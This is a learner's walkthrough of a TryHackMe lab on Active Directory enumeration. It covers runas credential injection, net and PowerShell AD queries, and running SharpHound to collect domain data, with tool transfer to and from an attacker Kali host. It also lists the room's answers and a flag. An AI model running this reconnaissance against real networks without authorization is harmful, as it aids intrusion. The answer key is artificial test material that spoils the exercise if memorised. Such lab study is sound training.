Task 1: Why AD Enumeration

Read through and understand the importance of Active Directory enumeration and how – even with low-privileged credentials – you can find some useful information to better understand the environment.

Also understand the cyclical nature of enumeration and compromise as the attacker pivots through the network.

1. Initial Recon
2. Initial Compromise
3. Foothold
4. Escalate Privileges
5. Internal Recon
6. Lateral Pivot
7. Persistence
8. Escalate Privileges
9. Objectives met?
   • No.
     • Return to step 5
   • Yes.
     • Complete mission

Connecting to the Network

I am using my own Kali VM to complete this room, not the AttackBox provided by TryHackMe.

Download the VPN connection pack and connect to the VPN as a background service.

# Run the VPN connection as a daemon in the background
sudo openvpn --config ./adenumeration.ovpn --daemon

When finished with the room, you can terminate the VPN connection with this command:

# Find the PID of the OpenVPN process
pid=$(sudo ps aux | grep -v grep | grep -i adenumeration | awk -v FS=' ' '{print $2}')

# Send SIGTERM to the PID
sudo kill -9 $pid

Edit DNS Configuration

I didn't follow the guidance in the room and took a much more simplistic approach. Please note that the /etc/resolv.conf configurations in the before and after shown below are specific to my environment.

Before

# Generated by NetworkManager
search cyber.range
nameserver 10.0.0.1

After

10.200.56.101 is the IP address of the thmdc (domain controller) in the network diagram. The domain controller is acting as the DNS resolver in the network environment.

# Generated by NetworkManager
search cyber.range za.tryhackme.com
nameserver 10.200.56.101 
nameserver 10.0.0.1
# Shorten name resolution timeouts to 1 second
options timeout:1
# Only attempt to resolve a hostname 2 times
options attempts:2

Run sudo systemctl restart networking.service after the changes to apply the changes.

Test Hostname Lookups

nslookup thmdc.za.tryhackme.com

Why does this work?

You're instructing the DNS resolution service to search between 10.200.56.101 and 10.0.0.1 . So, let's say you say something like this:

nslookup google.com

What's happening is this:

1. First ask 10.200.56.101 – "Do you know the IP address of google.com ?"

• If the domain controller answers, then stop the lookup process.
• If the domain controller doesn't have the answer, move on.

1. Then, ask 10.0.0.1 – "Do you know the IP address of google.com ?"

Request Credentials

This step is simulating the initial breach and credential discovery process. Navigate to http://distributor.za.tryhackme.com/creds in your browser and request some AD credentials.

Test SSH

Test your credentials using SSH to connect to a jump host. Replace user.name with yours retrieved from the server.

ssh user.name@za.tryhackme.com@thmjmp1.za.tryhackme.com

Test RDP

Replace user.name with yours retrieved from the server.

The /drive:.,kali-share option will let you mount the current working directory as a network drive in the RDP session, so you can upload and download files.

The +clipboard option allows copying and pasting between the target.

xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'password' /v:thmjmp1.za.tryhackme.com /drive:.,kali-share +clipboard

Task 2: Credential Injection

Read through and understand how you may find Active Directory credentials even on hosts unjoined to the domain. If that's the case, there are some tools we can use to leverage domain credentials when we've landed a foothold on an unjoined host.

runas.exe

In the example, we have the following command:

• /netonly - use the credentials for network sessions only, all other commands run in the current user session on the local host
• /user - the user we want to authenticate as in network sessions
• cmd.exe spawn a new command prompt window with the injected network credential

runas.exe /netonly /user:domain.tld\username cmd.exe

An attacker could then use the network session to enumerate SYSVOL on the domain controller, since even low level users can read it

Kerberos vs. NTLM

Kerberos authentication relies on fully qualified domain names (FQDN), because the FQDN of the service is referenced directly in the ticket. In Active Directory environments where Kerberos authentication is enabled, you may still be able to force services to fall back to NTLM authentication by using the IP address of a host.

NTLM is so heavily integrated into Microsoft products that in most cases it's going to be running side-by-side with Kerberos.

Questions

runas.exe

/netonly

SYSVOL

Kerberos authentication

Task 3: Enumeration through MMC

Connect to the Jump Host

I transferred the VPN connection file to a Windows VM in my lab to test credential injection in the previous task. However, despite all of the various things i tried, I could not get DNS resolution to work from my Windows VM. So, I'll just be using the jump host here.

xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'password123' /v:thmjmp1.za.tryhackme.com /drive:.,kali-share +clipboard

You don't need to worry about enabling RSAT if you're using the jump host. You can also skip the part about changing the forest and domain, as the jump host is already joined to the domain.

Questions

2

1

7

3

THM{Enumerating.Via.MMC}

Task 4: Enumerating though Command Prompt

net command

• net user /domain – Run on a domain-joined host to enumerate domain users
• net user user.name /domain – Run on a domain-joined host to get information about a specific domain user
• net group /domain – Run on a domain-joined host to enumerate domain groups
• net group groupName /domain – Run on a domain-joined host to get the members of a domain group
• net accounts /domain – Run on a domain-joined host to show the domain password and account lockout policy

Drawbacks

• net does not show nested groups
• net only shows up to 10 groups even if a user is in more

Questions

Internet Access

Nay

7

30

Task 5: Enumeration through PowerShell

SSH to the Jump Host

ssh user.name@za.tryhackme.com@thmjmp1.za.tryhackme.com

Run the command powershell to open a PowerShell terminal. Since we are running PowerShell on a domain-joined host, we do not need to pass the -Server parameter shown in the examples.

Users

• Get-ADUser -Filter * – return all domain users
• Get-ADUser -Filter 'Name -like "*stevens"' – find any user where name ends in ...stevens
• Get-ADUser -Identity john.doe -Properties * – find the user john.doe and return all properties

Groups

• Get-ADGroup -Filter * – return all domain groups
• Get-ADGroup -Identity Administrators | Get-ADGroupMember – pipe the Administrators group object to Get-ADGroupMember to retrieve members of the group

AD Objects

• Get any domain objects that we modified on or after a specific date and time

# February 28, 2022 00:00:00 (system time zone)
$modifiedDate = Get-Date '2022/02/28'
Get-ADObject -Filter "whenChanged -ge $modifiedDate" -IncludeDeletedObjects

Domains

• Get-ADDomain – get information about the domain from the domain controller

Change a User Password

$oldPass = Read-Host -AsSecureString -Prompt 'Enter the old password'
$newPass = Read-Host -AsSecureString -Prompt 'Enter the new password'
Set-ADAccountPassword -Identity user.name -OldPassword $oldpPass -NewPassword $newPass

Bonus: No RSAT? No Problem.

I wrote a brief document here on how you can borrow the MicrosoftActiveDirectory.Management.dll from any other Windows host where you've enabled RSAT to perform these same recon tasks.

If you're on a host that is not joined to the domain, import the .dll and then use the -Server parameter to make the queries.

Questions

Senior

CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

2/24/2022 10:04:41 PM

S-1-5-21-3330634377-1326264276-632209373-519

CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task 6: Bloodhound

Read and understand the significance and history of the Bloodhound and what makes it such a powerful domain enumeration tool.

Bloodhound and Collectors

Bloodhound is the software that runs locally on an attacker's machine. The attacker must run a "collector" on a target where it will enumerate lots of information about the domain. After the collector finishes running, it will output a series of .json files for import into the attacker's Bloodhound interface.

Practical

Download Bloodhound

You can download the latest release of sharphound.exe from the GitHub releases page:

Releases · BloodHoundAD/SharpHound

Contribute to BloodHoundAD/SharpHound development by creating an account on GitHub.

GitHubBloodHoundAD

wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip

Transfer to the Target

On my Kali VM, I am going to host a Python3 web server to transfer the .zip archive to the SSH session running on the jump host.

sudo python3 -m http.server 80

Run Bloodhound

Now, from the jump host in the PowerShell session, I'll use these commands:

cd ~/Documents

# Download the .zip file from Kali
Invoke-WebRequest http://kali-vpn-ip/SharpHound-v1.1.0.zip -OutFile SharpHound-v1.1
.0.zip

# Unzip the archive with PowerShell
Expand-Archive SharpHound-v1.1.0.zip
cd SharpHound-v1.1.0

Now, we're ready to run the collector, sharphound.exe .

.\SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

Transfer Data to Kali

Now that the collector has finished running, I've got a 20220805005305_BloodHound.zip that I need to transfer back to Kali for analysis. I'll use SCP to transfer the file.

scp username@za.tryhackme.com@thmjmp1.za.tryhackme.com:C:/Users/username/Documents/SharpHound-v1.1.0/20220805005305_BloodHound.zip .

Analyze with Bloodhound

If this is your first time running Bloodhound, follow the instructions in the room to get started.

neo4j console &
bloodhound &

Drag and drop the .zip file to Bloodhound and wait for it to load the data.

Attack Paths

• You can use the Search for a node... area to find specific users, groups, etc.
• You can click on specific properties of the object to graph things out (eg. group memberships)
• You can use the Analysis tab to run built-in queries (or write your own)
• Much, much more

Questions

SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

4

2

15

Task 7: Conclusion

Additional Enumeration Techniques

LDAP

I wrote some notes here on using a tool called ldapdomaindump .

PowerView

There is a lot of documentation on the web about enumeration using PowerView, but beware that it is not a good option, as it is very easily detected.

WMI

Really interesting and not something I'm familiar with. Linking here for future reference:

Offensive WMI - Active Directory Enumeration (Part 5)

This blog is the fifth installation of the “Offensive WMI” series that I’ve been writing on, and this post will cover Active Directory enumeration.Active Directory (AD) is Microsoft’s implementation of a directory and IAM service for Windows domain networks – which enables admins to manage permissi…

0xInfection's Blog

Clean Up DNS Changes

This will be unique to your own system and environment. For me, I'll be referring back to the Before step here.